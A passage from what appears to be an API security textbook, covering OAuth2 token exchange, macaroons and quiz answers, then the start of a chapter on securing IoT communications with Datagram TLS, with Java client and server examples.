vice16 pretending to be Alice! Think of it as a mask being passed from actor
to actor, rather than a single actor wearing multiple layers of masks.
Listing 11.15 An exchanged access token introspection response

{
  "aud": "https://service26.example.com",
  "iss": "https://issuer.example.com",
  "exp": 1443904100,
  "nbf": 1443904000,
  "sub": "[email protected]",                  <-- The effective user of the token
  "act": {
    "sub": "https://service16.example.com",    <-- The service that is acting on behalf of the user
    "act": {
      "sub": "https://service77.example.com"   <-- A previous service that also acted on behalf of the user in the same request
    }
  }
}
Token exchange introduces an additional network roundtrip to the AS to exchange
the access token at each hop of servicing a request. It can therefore be more expen-
sive than the phantom token pattern and introduce additional latency in a microser-
vices architecture. Token exchange is more compelling when service calls cross trust
boundaries and latency is less of a concern. For example, in healthcare, a patient may
enter the healthcare system and be treated by multiple healthcare providers, each of
which needs some level of access to the patient’s records. Token exchange allows one
provider to hand off access to another provider without repeatedly asking the patient
for consent. The AS decides an appropriate level of access for each service based on
configured authorization policies.
NOTE
When multiple clients and organizations are granted access to user data
based on a single consent flow, you should ensure that this is indicated to the
user in the initial consent screen so that they can make an informed decision.
Macaroons for service APIs
If the scope or authority of a token only needs to be reduced when calling other ser-
vices, a macaroon-based access token (chapter 9) can be used as an alternative to
token exchange. Recall that a macaroon allows any party to append caveats to the
token, restricting what it can be used for. For example, an initial broad-scoped token
supplied by a user granting access to their patient records can be restricted with
caveats before calling external services, perhaps only to allow access to notes from
the last 24 hours. The advantage is that this can be done locally (and efficiently) with-
out having to call the AS to exchange the token.
A common use of service credentials is for a frontend API to make calls to a backend
database. The frontend API typically has a username and password that it uses to
connect, with privileges to perform a wide range of operations. If instead the data-
base used macaroons for authorization, it could issue a broadly privileged macaroon
to the frontend service. The frontend service can then append caveats to the maca-
roon and reissue it to its own API clients and ultimately to users. For example, it might
append a caveat user = "mary" to a token issued to Mary so that she can only read
her own data, and an expiry time of 5 minutes. These constrained tokens can then
be passed all the way back to the database, which can enforce the caveats. This was
the approach adopted by the Hyperdex database (http://mng.bz/gg1l). Very few data-
bases support macaroons today, but in a microservice architecture you can use the
same techniques to allow more flexible and dynamic access control.
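As a brief sketch of that idea using the jmacaroons library: the caveat language is application-defined, so the exact predicates below (and the helper name) are illustrative.

import com.github.nitram509.jmacaroons.Macaroon;
import com.github.nitram509.jmacaroons.MacaroonsBuilder;

// Restrict a broadly privileged macaroon before handing it to a client:
// only Mary's data, and only for the next five minutes.
static Macaroon restrictForMary(Macaroon broadToken) {
    return MacaroonsBuilder.modify(broadToken)
            .add_first_party_caveat("user = \"mary\"")
            .add_first_party_caveat("time < " +
                    (System.currentTimeMillis() + 5 * 60 * 1000))
            .getMacaroon();
}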
Pop quiz

13 In the phantom token pattern, the original access token is replaced by which one of the following?
   a A macaron
   b A SAML assertion
   c A short-lived signed JWT
   d An OpenID Connect ID token
   e A token issued by an internal AS

14 In OAuth2 token exchange, which parameter is used to communicate a token that represents the user on whose behalf the client is operating?
   a The scope parameter
   b The resource parameter
   c The audience parameter
   d The actor_token parameter
   e The subject_token parameter

The answers are at the end of the chapter.
Answers to pop quiz questions

1 d and e. API keys identify services, external organizations, or businesses that need to call your API. An API key may have a long expiry time or never expire, while user tokens typically expire after minutes or hours.
2 e.
3 e. Client credentials and service account authentication can use the same mechanisms; the primary benefit of using a service account is that clients are often stored in a private database that only the AS has access to. Service accounts live in the same repository as other users and so APIs can query identity details and role/group memberships.
4 c, d, and e.
5 e. The CertificateRequest message is sent to request client certificate authentication. If it's not sent by the server, then the client can't use a certificate.
6 c. The client signs all previous messages in the handshake with the private key. This prevents the message being reused for a different handshake.
7 b.
8 f. The only check required is to compare the hash of the certificate. The AS performs all other checks when it issues the access token. While an API can optionally implement additional checks, these are not required for security.
9 False. A client can request certificate-bound access tokens even if it uses a different client authentication method. Even a public client can request certificate-bound access tokens.
10 a and d.
11 d.
12 b. HKDF-Expand. HKDF-Extract is used to convert non-uniform input key material into a uniformly random master key.
13 c.
14 e.
Summary
API keys are often used to authenticate service-to-service API calls. A signed or
encrypted JWT is an effective API key. When used to authenticate a client, this is
known as JWT bearer authentication.
OAuth2 supports service-to-service API calls through the client credentials grant
type that allows a client to obtain an access token under its own authority.
A more flexible alternative to the client credentials grant is to create service
accounts which act like regular user accounts but are intended for use by services.
Service accounts should be protected with strong authentication mechanisms
because they often have elevated privileges compared to normal accounts.
The JWT bearer grant type can be used to obtain an access token for a service
account using a JWT. This can be used to deploy short-lived JWTs to services
when they start up that can then be exchanged for access and refresh tokens.
This avoids leaving long-lived, highly-privileged credentials on disk where they
might be accessed.
TLS client certificates can be used to provide strong authentication of service
clients. Certificate-bound access tokens improve the security of OAuth2 and
prevent token theft and misuse.
Kubernetes includes a simple method for distributing credentials to services,
but it suffers from some security weaknesses. Secret vaults and key management
services provide better security but need an initial credential to access. A short-
lived JWT can provide this initial credential with the least risk.
When service-to-service API calls are made in response to user requests, care
should be taken to avoid confused deputy attacks. To avoid this, the original user
identity should be communicated to backend services. The phantom token pat-
tern provides an efficient way to achieve this in a microservice architecture, while
OAuth2 token exchange and macaroons can be used across trust boundaries.
Part 5
APIs for the Internet of Things
This final part of the book deals with securing APIs in one of the most chal-
lenging environments: the Internet of Things (IoT). IoT devices are often lim-
ited in processing power, battery life, and other physical characteristics, making
it difficult to apply many of the techniques from earlier in the book. In this part,
you’ll see how to adapt techniques to be more suitable for such constrained
devices.
Chapter 12 begins with a look at the crucial issue of securing communica-
tions between devices and APIs. You’ll see how transport layer security can be
adapted to device communication protocols using DTLS and pre-shared keys.
Securing communications from end to end when requests and responses must
pass over multiple different transport protocols is the focus of the second half of
the chapter.
Chapter 13 concludes the book with a discussion of authentication and
authorization techniques for IoT APIs. It discusses approaches to avoid replay
attacks and other subtle security issues and concludes with a look at handling
authorization when a device is offline.
12 Securing IoT communications

This chapter covers
 Securing IoT communications with Datagram TLS
 Choosing appropriate cryptographic algorithms for constrained devices
 Implementing end-to-end security for IoT APIs
 Distributing and managing device keys

So far, all the APIs you've looked at have been running on servers in the safe confines of a datacenter or server room. It's easy to take the physical security of the API hardware for granted, because the datacenter is a secure environment with restricted access and decent locks on the doors. Often only specially vetted staff are allowed into the server room to get close to the hardware. Traditionally, even the clients of an API could be assumed to be reasonably secure because they were desktop PCs installed in an office environment. This has rapidly changed as first laptops and then smartphones have moved API clients out of the office environment. The internet of things (IoT) widens the range of environments even further, especially in industrial or agricultural settings where devices may be deployed in remote environments with little physical protection or monitoring. These IoT devices talk to APIs in messaging services to stream sensor data to the cloud and provide APIs of
their own to allow physical actions to be taken, such as adjusting machinery in a water
treatment plant or turning off the lights in your home or office. In this chapter, you’ll
see how to secure the communications of IoT devices when talking to each other and
to APIs in the cloud. In chapter 13, we’ll discuss how to secure APIs provided by
devices themselves.
DEFINITION
The internet of things (IoT) is the trend for devices to be connected
to the internet to allow easier management and communication. Consumer IoT
refers to personal devices in the home being connected to the internet, such
as a refrigerator that automatically orders more beer when you run low. IoT
techniques are also applied in industry under the name industrial IoT (IIoT).
12.1 Transport layer security
In a traditional API environment, securing the communications between a client and
a server is almost always based on TLS. The TLS connection between the two parties is
likely to be end-to-end (or near enough) and using strong authentication and encryp-
tion algorithms. For example, a client making a request to a REST API can make a
HTTPS connection directly to that API and then largely assume that the connection is
secure. Even when the connection passes through one or more proxies, these typically
just set up the connection and then copy encrypted bytes from one socket to another.
In the IoT world, things are more complicated for many reasons:
The IoT device may be constrained, reducing its ability to execute the public key
cryptography used in TLS. For example, the device may have limited CPU
power and memory, or may be operating purely on battery power that it needs
to conserve.
For efficiency, devices often use compact binary formats and low-level network-
ing based on UDP rather than high-level TCP-based protocols such as HTTP
and TLS.
A variety of protocols may be used to transmit a single message from a device to
its destination, from short-range wireless protocols such as Bluetooth Low
Energy (BLE) or Zigbee, to messaging protocols like MQTT or XMPP. Gateway
devices can translate messages from one protocol to another, as shown in fig-
ure 12.1, but need to decrypt the protocol messages to do so. This prevents a
simple end-to-end TLS connection being used.
Some commonly used cryptographic algorithms are difficult to implement
securely or efficiently on devices due to hardware constraints or new threats
from physical attackers that are less applicable to server-side APIs.
DEFINITION
A constrained device has significantly reduced CPU power, mem-
ory, connectivity, or energy availability compared to a server or traditional
API client machine. For example, the memory available to a device may be
measured in kilobytes compared to the gigabytes often now available to most
servers and even smartphones. RFC 7228 (https://tools.ietf.org/html/rfc7228)
describes common ways that devices are constrained.
In this section, you’ll learn about how to secure IoT communications at the transport
layer and the appropriate choice of algorithms for constrained devices.
TIP
There are several TLS libraries that are explicitly designed for IoT appli-
cations, such as ARM’s mbedTLS (https://tls.mbed.org), WolfSSL (https://www
.wolfssl.com), and BearSSL (https://bearssl.org).
12.1.1 Datagram TLS
TLS is designed to secure traffic sent over TCP (Transmission Control Protocol),
which is a reliable stream-oriented protocol. Most application protocols in common
use, such as HTTP, LDAP, or SMTP (email), all use TCP and so can use TLS to secure
the connection. But a TCP implementation has some downsides when used in con-
strained IoT devices, such as the following:
A TCP implementation is complex and requires a lot of code to implement cor-
rectly. This code takes up precious space on the device, reducing the amount of
code available to implement other functions.
TCP’s reliability features require the sending device to buffer messages until
they have been acknowledged by the receiver, which increases storage require-
ments. Many IoT sensors produce continuous streams of real-time data, for
which it doesn’t make sense to retransmit lost messages because more recent
data will already have replaced it.
A standard TCP header is at least 20 bytes long, which can add quite a lot of
overhead to short messages.
TCP is unable to use features such as multicast delivery that allow a single mes-
sage to be sent to many devices at once. Multicast can be much more efficient
than sending messages to each device individually.
Figure 12.1 Messages from IoT devices are often translated from one protocol to another. The original device may use low-power wireless networking such as Bluetooth Low-Energy (BLE) to communicate with a local gateway that retransmits messages using application protocols such as MQTT or HTTP.
IoT devices often put themselves into sleep mode to preserve battery power
when not in use. This causes TCP connections to terminate and requires an
expensive TCP handshake to be performed to re-establish the connection when
the device wakes. Alternatively, the device can periodically send keep-alive mes-
sages to keep the connection open, at the cost of increased battery and band-
width usage.
Many protocols used in the IoT instead opt to build on top of the lower-level User
Datagram Protocol (UDP), which is much simpler than TCP but provides only con-
nectionless and unreliable delivery of messages. For example, the Constrained Application Protocol (CoAP) provides an alternative to HTTP for constrained devices and is based on UDP. To protect these protocols, a variation of TLS known as Datagram TLS (DTLS) has been developed. (DTLS is currently limited to securing unicast UDP connections and can't secure multicast broadcasts.)
DEFINITION
Datagram Transport Layer Security (DTLS) is a version of TLS
designed to work with connectionless UDP-based protocols rather than TCP-
based ones. It provides the same protections as TLS, except that packets may
be reordered or replayed without detection.
Recent DTLS versions correspond to TLS versions; for example, DTLS 1.2 corre-
sponds to TLS 1.2 and supports similar cipher suites and extensions. At the time of
writing, DTLS 1.3 is just being finalized, which corresponds to the recently standard-
ized TLS 1.3.
QUIC
A middle ground between TCP and UDP is provided by Google’s QUIC protocol (Quick
UDP Internet Connections; https://en.wikipedia.org/wiki/QUIC), which will form the
basis of the next version of HTTP: HTTP/3. QUIC layers on top of UDP but provides
many of the same reliability and congestion control features as TCP. A key feature of
QUIC is that it integrates TLS 1.3 directly into the transport protocol, reducing the
overhead of the TLS handshake and ensuring that low-level protocol features also
benefit from security protections. Google has already deployed QUIC into production,
and around 7% of Internet traffic now uses the protocol.
QUIC was originally designed to accelerate Google’s traditional web server HTTPS
traffic, so compact code size was not a primary objective. However, the protocol can
offer significant advantages to IoT devices in terms of reduced network usage and
low-latency connections. Early experiments such as an analysis from Santa Clara Uni-
versity (http://mng.bz/X0WG) and another by NetApp (https://eggert.org/papers/
2020-ndss-quic-iot.pdf) suggest that QUIC can provide significant savings in an IoT
context, but the protocol has not yet been published as a final standard. Although not
yet achieving widespread adoption in IoT applications, it’s likely that QUIC will
become increasingly important over the next few years.
Although Java supports DTLS, it only does so in the form of the low-level SSLEngine
class, which implements the raw protocol state machine. There is no equivalent of the
high-level SSLSocket class that is used by normal (TCP-based) TLS, so you must do
some of the work yourself. Libraries for higher-level protocols such as CoAP will
handle much of this for you, but because there are so many protocols used in IoT
applications, in the next few sections you’ll learn how to manually add DTLS to a
UDP-based protocol.
NOTE
The code examples in this chapter continue to use Java for consis-
tency. Although Java is a popular choice on more capable IoT devices and
gateways, programming constrained devices is more often performed in C
or another language with low-level device support. The advice on secure
configuration of DTLS and other protocols in this chapter is applicable to
all languages and DTLS libraries. Skip ahead to section 12.1.2 if you are not
using Java.
IMPLEMENTING A DTLS CLIENT
To begin a DTLS handshake in Java, you first create an SSLContext object, which indi-
cates how to authenticate the connection. For a client connection, you initialize the
context exactly like you did in section 7.4.2 when securing the connection to an
OAuth2 authorization server, as shown in listing 12.1. First, obtain an SSLContext for
DTLS by calling SSLContext.getInstance("DTLS"). This will return a context that
allows DTLS connections with any supported protocol version (DTLS 1.0 and DTLS
1.2 in Java 11). You can then load the certificates of trusted certificate authorities
(CAs) and use this to initialize a TrustManagerFactory, just as you’ve done in previ-
ous chapters. The TrustManagerFactory will be used by Java to determine if the
server's certificate is trusted. In this case, you can use the as.example.com.ca.p12 file
that you created in chapter 7 containing the mkcert CA certificate. The PKIX (Public
Key Infrastructure with X.509) trust manager factory algorithm should be used. Finally,
you can initialize the SSLContext object, passing in the trust managers from the factory,
using the SSLContext.init() method. This method takes three arguments:
An array of KeyManager objects, which are used if performing client certificate
authentication (covered in chapter 11). Because this example doesn’t use client
certificates, you can leave this null.
The array of TrustManager objects obtained from the TrustManagerFactory.
An optional SecureRandom object to use when generating random key material
and other data during the TLS handshake. You can leave this null in most cases
to let Java choose a sensible default.
Create a new file named DtlsClient.java in the src/main/com/manning/apisecurity-
inaction folder and type in the contents of the listing.
NOTE
The examples in this section assume you are familiar with UDP net-
work programming in Java. See http://mng.bz/yr4G for an introduction.
Listing 12.1 The client SSLContext

package com.manning.apisecurityinaction;

import javax.net.ssl.*;
import java.io.FileInputStream;
import java.nio.file.*;
import java.security.KeyStore;
import org.slf4j.*;

import static java.nio.charset.StandardCharsets.UTF_8;

public class DtlsClient {
    private static final Logger logger =
            LoggerFactory.getLogger(DtlsClient.class);

    private static SSLContext getClientContext() throws Exception {
        // Create an SSLContext for DTLS.
        var sslContext = SSLContext.getInstance("DTLS");

        // Load the trusted CA certificates as a keystore.
        var trustStore = KeyStore.getInstance("PKCS12");
        trustStore.load(new FileInputStream("as.example.com.ca.p12"),
                "changeit".toCharArray());

        // Initialize a TrustManagerFactory with the trusted certificates.
        var trustManagerFactory = TrustManagerFactory.getInstance("PKIX");
        trustManagerFactory.init(trustStore);

        // Initialize the SSLContext with the trust manager.
        sslContext.init(null, trustManagerFactory.getTrustManagers(), null);
        return sslContext;
    }
}
After you've created the SSLContext, you can use the createSSLEngine() method on it
to create a new SSLEngine object. This is the low-level protocol implementation that is
normally hidden by higher-level protocol libraries like the HttpClient class you used
in chapter 7. For a client, you should pass the address and port of the server to the
method when creating the engine and configure the engine to perform the client side
of the DTLS handshake by calling setUseClientMode(true), as shown in the follow-
ing example.
NOTE
You don’t need to type in this example (and the other SSLEngine
examples), because I have provided a wrapper class that hides some of this
complexity and demonstrates correct use of the SSLEngine. See http://mng
.bz/Mo27. You’ll use that class in the example client and server shortly.
var engine = sslContext.createSSLEngine("localhost", 54321);
engine.setUseClientMode(true);
You should then allocate buffers for sending and receiving network packets, and for
holding application data. The SSLSession associated with an engine has methods that
provide hints for the correct size of these buffers, which you can query to ensure you
allocate enough space, as shown in the following example code (again, you don’t
need to type this in):
// Retrieve the SSLSession from the engine and use its hints to
// correctly size the data buffers.
var session = engine.getSession();
var receiveBuffer =
        ByteBuffer.allocate(session.getPacketBufferSize());
var sendBuffer =
        ByteBuffer.allocate(session.getPacketBufferSize());
var applicationData =
        ByteBuffer.allocate(session.getApplicationBufferSize());
These initial buffer sizes are hints, and the engine will tell you if they need to be
resized as you’ll see shortly. Data is moved between buffers by using the following two
method calls, also illustrated in figure 12.2:
sslEngine.wrap(appData, sendBuf) causes the SSLEngine to consume any waiting application data from the appData buffer and write one or more DTLS packets into the network sendBuf that can then be sent to the other party.

sslEngine.unwrap(recvBuf, appData) instructs the SSLEngine to consume received DTLS packets from the recvBuf and output any decrypted application data into the appData buffer.

Figure 12.2 The SSLEngine uses two methods to move data between the application and network buffers: wrap() consumes application data to send and writes DTLS packets into the send buffer, while unwrap() consumes data from the receive buffer and writes unencrypted application data back into the application buffer. A DatagramChannel is used to send and receive the individual UDP packets.
To start the DTLS handshake, call sslEngine.beginHandshake(). Rather than block-
ing until the handshake is complete, this configures the engine to expect a new DTLS
handshake to begin. Your application code is then responsible for polling the engine
to determine the next action to take and sending or receiving UDP messages as indi-
cated by the engine.
To poll the engine, you call the sslEngine.getHandshakeStatus() method, which
returns one of the following values, as shown in figure 12.3:
Figure 12.3 The SSLEngine handshake state machine involves four main states. In the NEED_UNWRAP and NEED_UNWRAP_AGAIN states, you should use the unwrap() call to supply it with received network data. The NEED_WRAP state indicates that new DTLS packets should be retrieved with the wrap() call and then sent to the other party. The NEED_TASK state is used when the engine needs to execute expensive cryptographic functions.

NEED_UNWRAP indicates that the engine is waiting to receive a new message from the server. Your application code should call the receive() method on its UDP DatagramChannel to receive a packet from the server, and then call the SSLEngine.unwrap() method, passing in the data it received.
NEED_UNWRAP_AGAIN indicates that there is remaining input that still needs to be
processed. You should immediately call the unwrap() method again with an
empty input buffer to process the message. This can happen if multiple DTLS
records arrived in a single UDP packet.
NEED_WRAP indicates that the engine needs to send a message to the server. The
application should call the wrap() method with an output buffer that will be
filled with the new DTLS message, which your application should then send to
the server.
NEED_TASK indicates that the engine needs to perform some (potentially expen-
sive) processing, such as performing cryptographic operations. You can call the
getDelegatedTask() method on the engine to get one or more Runnable
objects to execute. The method returns null when there are no more tasks to
run. You can either run these immediately, or you can run them using a back-
ground thread pool if you don’t want to block your main thread while they
complete.
FINISHED indicates that the handshake has just finished, while NOT_HANDSHAK-
ING indicates that no handshake is currently in progress (either it has already
finished or has not been started). The FINISHED status is only generated once
by the last call to wrap() or unwrap() and then the engine will subsequently
produce a NOT_HANDSHAKING status.
Listing 12.2 shows the outline of how the basic loop for performing a DTLS hand-
shake with SSLEngine is performed based on the handshake status codes.
NOTE
This listing has been simplified compared to the implementation in
the GitHub repository accompanying the book, but the core logic is correct.
Listing 12.2 SSLEngine handshake loop

// Trigger a new DTLS handshake. The recvBuf, sendBuf, and appData
// buffers are the network and application buffers allocated earlier.
engine.beginHandshake();

// Loop until the handshake is finished.
var handshakeStatus = engine.getHandshakeStatus();
while (handshakeStatus != HandshakeStatus.FINISHED) {
    SSLEngineResult result;
    switch (handshakeStatus) {
        case NEED_UNWRAP:
            // In the NEED_UNWRAP state, wait for a network packet
            // if one hasn't already been received.
            if (recvBuf.position() == 0) {
                channel.receive(recvBuf);
            }
            // Fall through to the NEED_UNWRAP_AGAIN case.
        case NEED_UNWRAP_AGAIN:
            // Process any received DTLS packets by calling engine.unwrap().
            result = engine.unwrap(recvBuf.flip(), appData);
            recvBuf.compact();
            // Check the result status of the unwrap() call and
            // update the handshake state.
            checkStatus(result.getStatus());
            handshakeStatus = result.getHandshakeStatus();
            break;
        case NEED_WRAP:
            // In the NEED_WRAP state, call the wrap() method and then
            // send the resulting DTLS packets.
            result = engine.wrap(appData.flip(), sendBuf);
            appData.compact();
            channel.write(sendBuf.flip());
            sendBuf.compact();
            checkStatus(result.getStatus());
            handshakeStatus = result.getHandshakeStatus();
            break;
        case NEED_TASK:
            // For NEED_TASK, run any delegated tasks directly (or
            // submit them to a thread pool).
            Runnable task;
            while ((task = engine.getDelegatedTask()) != null) {
                task.run();
            }
            handshakeStatus = engine.getHandshakeStatus();
            break;
        default:
            throw new IllegalStateException();
    }
}
The wrap() and unwrap() calls return a status code for the operation as well as a new
handshake status, which you should check to ensure that the operation completed
correctly. The possible status codes are shown in table 12.1. If you need to resize a buf-
fer, you can query the current SSLSession to determine the recommended applica-
tion and network buffer sizes and compare that to the amount of space left in the
buffer. If the buffer is too small, you should allocate a new buffer and copy any exist-
ing data into the new buffer. Then retry the operation again.
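A minimal sketch of that resizing logic might look like the following; the enlarge helper is not part of the SSLEngine API, just a convenience for this example.

import java.nio.ByteBuffer;

// Grow a buffer to the size recommended by the current SSLSession,
// preserving any data already written into it, then retry the operation.
static ByteBuffer enlarge(ByteBuffer buf, int recommendedSize) {
    if (buf.capacity() >= recommendedSize) {
        return buf;  // already big enough
    }
    var bigger = ByteBuffer.allocate(recommendedSize);
    buf.flip();        // switch the old buffer to reading mode
    bigger.put(buf);   // copy across the existing contents
    return bigger;
}

// For example, on BUFFER_OVERFLOW from unwrap():
// appData = enlarge(appData, engine.getSession().getApplicationBufferSize());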
Using the DtlsDatagramChannel class from the GitHub repository accompanying the
book, you can now implement a working DTLS client example application. The sam-
ple class requires that the underlying UDP channel is connected before the DTLS hand-
shake occurs. This restricts the channel to send packets to only a single host and
receive packets from only that host too. This is not a limitation of DTLS but just a sim-
plification made to keep the sample code short. A consequence of this decision is that
the server that you’ll develop in the next section can only handle a single client at a
time and will discard packets from other clients. It’s not much harder to handle con-
current clients but you need to associate a unique SSLEngine with each client.
Table 12.1 SSLEngine operation status codes

Status code        Meaning
OK                 The operation completed successfully.
BUFFER_UNDERFLOW   The operation failed because there was not enough input data.
                   Check that the input buffer has enough space remaining. For an
                   unwrap operation, you should receive another network packet if
                   this status occurs.
BUFFER_OVERFLOW    The operation failed because there wasn't enough space in the
                   output buffer. Check that the buffer is large enough and
                   resize it if necessary.
CLOSED             The other party has indicated that they are closing the
                   connection, so you should process any remaining packets and
                   then close the SSLEngine too.
DEFINITION
A UDP channel (or socket) is connected when it is restricted to
only send or receive packets from a single host. Using connected channels
simplifies programming and can be more efficient, but packets from other cli-
ents will be silently discarded. The connect() method is used to connect a
Java DatagramChannel.
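For example, with a plain Java DatagramChannel (the port number is just the one used by the examples in this section):

import java.net.InetSocketAddress;
import java.nio.channels.DatagramChannel;

var channel = DatagramChannel.open();
// From now on the channel only exchanges packets with this one peer;
// datagrams from any other address are silently discarded.
channel.connect(new InetSocketAddress("localhost", 54321));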
Listing 12.3 shows a sample client that connects to a server and then sends the con-
tents of a text file line by line. Each line is sent as an individual UDP packet and will be
encrypted using DTLS. After the packets are sent, the client queries the SSLSession
to print out the DTLS cipher suite that was used for the connection. Open the Dtls-
Client.java file you created earlier and add the main method shown in the listing. Cre-
ate a text file named test.txt in the root folder of the project and add some example
text to it, such as lines from Shakespeare, your favorite quotes, or anything you like.
NOTE
You won’t be able to use this client until you write the server to accom-
pany it in the next section.
Listing 12.3 The DTLS client

public static void main(String... args) throws Exception {
    // Open the DTLS channel with the client SSLContext, and open
    // a text file to send to the server.
    try (var channel = new DtlsDatagramChannel(getClientContext());
         var in = Files.newBufferedReader(Paths.get("test.txt"))) {
        logger.info("Connecting to localhost:54321");
        // Connect to the server running on the local machine, port 54321.
        channel.connect("localhost", 54321);

        // Send the lines of text to the server.
        String line;
        while ((line = in.readLine()) != null) {
            logger.info("Sending packet to server: {}", line);
            channel.send(line.getBytes(UTF_8));
        }

        logger.info("All packets sent");
        // Print details of the DTLS connection.
        logger.info("Used cipher suite: {}",
                channel.getSession().getCipherSuite());
    }
}
After the client completes, it will automatically close the DtlsDatagramChannel, which
will trigger shutdown of the associated SSLEngine object. Closing a DTLS session is
not as simple as just closing the UDP channel, because each party must send each
other a close-notify alert message to signal that the DTLS session is being closed. In
Java, the process is similar to the handshake loop that you saw earlier in listing 12.2.
First, the client should indicate that it will not send any more packets by calling the
closeOutbound() method on the engine. You should then call the wrap() method
to allow the engine to produce the close-notify alert message and send that message to
the server, as shown in listing 12.4. Once the alert has been sent, you should process
incoming messages until you receive a corresponding close-notify from the server, at
which point the SSLEngine will return true from the isInboundDone() method and
you can then close the underlying UDP DatagramChannel.
If the other side closes the channel first, then the next call to unwrap() will return
a CLOSED status. In this case, you should reverse the order of operations: first close the
inbound side and process any received messages and then close the outbound side
and send your own close-notify message.
Listing 12.4 Handling shutdown

public void close() throws IOException {
    // Indicate that no further outbound application packets will be sent.
    sslEngine.closeOutbound();

    // Call wrap() to generate the close-notify alert message and
    // send it to the server.
    sslEngine.wrap(appData.flip(), sendBuf);
    appData.compact();
    channel.write(sendBuf.flip());
    sendBuf.compact();

    // Wait until a close-notify is received from the server.
    while (!sslEngine.isInboundDone()) {
        channel.receive(recvBuf);
        sslEngine.unwrap(recvBuf.flip(), appData);
        recvBuf.compact();
    }

    // Indicate that the inbound side is now done too and close
    // the UDP channel.
    sslEngine.closeInbound();
    channel.close();
}
IMPLEMENTING A DTLS SERVER
Initializing a SSLContext for a server is similar to the client, except in this case you use a
KeyManagerFactory to supply the server’s certificate and private key. Because you’re not
using client certificate authentication, you can leave the TrustManager array as null.
Listing 12.5 shows the code for creating a server-side DTLS context. Create a new file
named DtlsServer.java next to the client and type in the contents of the listing.
Listing 12.5 The server SSLContext

package com.manning.apisecurityinaction;

import java.io.FileInputStream;
import java.nio.ByteBuffer;
import java.security.KeyStore;
import javax.net.ssl.*;
import org.slf4j.*;

import static java.nio.charset.StandardCharsets.UTF_8;

public class DtlsServer {
    private static final Logger logger =
            LoggerFactory.getLogger(DtlsServer.class);

    private static SSLContext getServerContext() throws Exception {
        // Create a DTLS SSLContext again.
        var sslContext = SSLContext.getInstance("DTLS");

        // Load the server's certificate and private key from a keystore.
        var keyStore = KeyStore.getInstance("PKCS12");
        keyStore.load(new FileInputStream("localhost.p12"),
                "changeit".toCharArray());

        // Initialize the KeyManagerFactory with the keystore.
        var keyManager = KeyManagerFactory.getInstance("PKIX");
        keyManager.init(keyStore, "changeit".toCharArray());

        // Initialize the SSLContext with the key manager.
        sslContext.init(keyManager.getKeyManagers(), null, null);
        return sslContext;
    }
}
In this example, the server will be running on localhost, so use mkcert to generate a key pair and signed certificate if you don't already have one (refer to chapter 3 if you haven't installed mkcert yet), by running

mkcert -pkcs12 localhost
in the root folder of the project. You can then implement the DTLS server as shown in
listing 12.6. Just as in the client example, you can use the DtlsDatagramChannel class
to simplify the handshake. Behind the scenes, the same handshake process will occur,
but the order of wrap() and unwrap() operations will be different due to the different
roles played in the handshake. Open the DtlsServer.java file you created earlier and
add the main method shown in the listing.
NOTE
The DtlsDatagramChannel provided in the GitHub repository accom-
panying the book will automatically connect the underlying DatagramChannel
to the first client that it receives a packet from and discard packets from other
clients until that client disconnects.
Listing 12.6 The DTLS server

public static void main(String... args) throws Exception {
    // Create the DtlsDatagramChannel and bind to port 54321.
    try (var channel = new DtlsDatagramChannel(getServerContext())) {
        channel.bind(54321);
        logger.info("Listening on port 54321");

        // Allocate a buffer for data received from the client.
        var buffer = ByteBuffer.allocate(2048);
        while (true) {
            // Receive decrypted UDP packets from the client.
            channel.receive(buffer);
            buffer.flip();
            var data = UTF_8.decode(buffer).toString();
            // Print out the received data.
            logger.info("Received: {}", data);
            buffer.compact();
        }
    }
}
You can now start the server by running the following command:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.DtlsServer
This will produce many lines of output as it compiles and runs the code. You’ll see the
following line of output once the server has started up and is listening for UDP pack-
ets from clients:
[com.manning.apisecurityinaction.DtlsServer.main()] INFO com.manning.apisecurityinaction.DtlsServer - Listening on port 54321
You can now run the client in another terminal window by running:
mvn clean compile exec:java \
-Dexec.mainClass=com.manning.apisecurityinaction.DtlsClient
TIP
If you want to see details of the DTLS protocol messages being sent
between the client and server, add the argument -Djavax.net.debug=all to
the Maven command line. This will produce detailed logging of the hand-
shake messages.
The client will start up, connect to the server, and send all of the lines of text from the
input file to the server, which will receive them all and print them out. After the client
has completed, it will print out the DTLS cipher suite that it used so that you can see
what was negotiated. In the next section, you’ll see how the default choice made by
Java might not be appropriate for IoT applications and how to choose a more suitable
replacement.
NOTE
This example is intended to demonstrate the use of DTLS only and is
not a production-ready network protocol. If you separate the client and server
over a network, it is likely that some packets will get lost. Use a higher-level
application protocol such as CoAP if your application requires reliable packet
delivery (or use normal TLS over TCP).
12.1.2 Cipher suites for constrained devices
In previous chapters, you've followed the guidance from Mozilla (https://wiki.mozilla.org/Security/Server_Side_TLS) when choosing
secure TLS cipher suites (recall from chapter 7 that a cipher suite is a collection of cryp-
tographic algorithms chosen to work well together). This guidance is aimed at secur-
ing traditional web server applications and their clients, but these cipher suites are
not always suitable for IoT use for several reasons:
The size of code required to implement these suites securely can be quite large
and require many cryptographic primitives. For example, the cipher suite
ECDHE-RSA-AES256-SHA384 requires implementing Elliptic Curve Diffie-Hellman
(ECDH) key agreement, RSA signatures, AES encryption and decryption opera-
tions, and the SHA-384 hash function with HMAC!
Modern recommendations heavily promote the use of AES in Galois/Counter
Mode (GCM), because this is extremely fast and secure on modern Intel chips
due to hardware acceleration. But it can be difficult to implement securely in
software on constrained devices and fails catastrophically if misused.
Some cryptographic algorithms, such as SHA-512 or SHA-384, are rarely hardware-
accelerated and are designed to perform well when implemented in software on
64-bit architectures. There can be a performance penalty when implementing
these algorithms on 32-bit architectures, which are very common in IoT devices.
In low-power environments, 8-bit microcontrollers are still commonly used,
which makes implementing such algorithms even more challenging.
Modern recommendations concentrate on cipher suites that provide forward
secrecy as discussed in chapter 7 (also known as perfect forward secrecy). This is a
very important security property, but it increases the computational cost of
these cipher suites. All of the forward secret cipher suites in TLS require imple-
menting both a signature algorithm (such as RSA) and a key agreement algo-
rithm (usually, ECDH), which increases the code size. (Thomas Pornin, the author of the BearSSL library, has detailed notes on the cost of different TLS cryptographic algorithms at https://bearssl.org/support.html.)
Nonce reuse and AES-GCM in DTLS
The most popular symmetric authenticated encryption mode used in modern TLS
applications is based on AES in Galois/Counter Mode (GCM). GCM requires that each
packet is encrypted using a unique nonce and loses almost all security if the same
nonce is used to encrypt two different packets. When GCM was first introduced for
TLS 1.2, it required an 8-byte nonce to be explicitly sent with every record. Although
this nonce could be a simple counter, some implementations decided to generate it
randomly. Because 8 bytes is not large enough to safely generate randomly, these
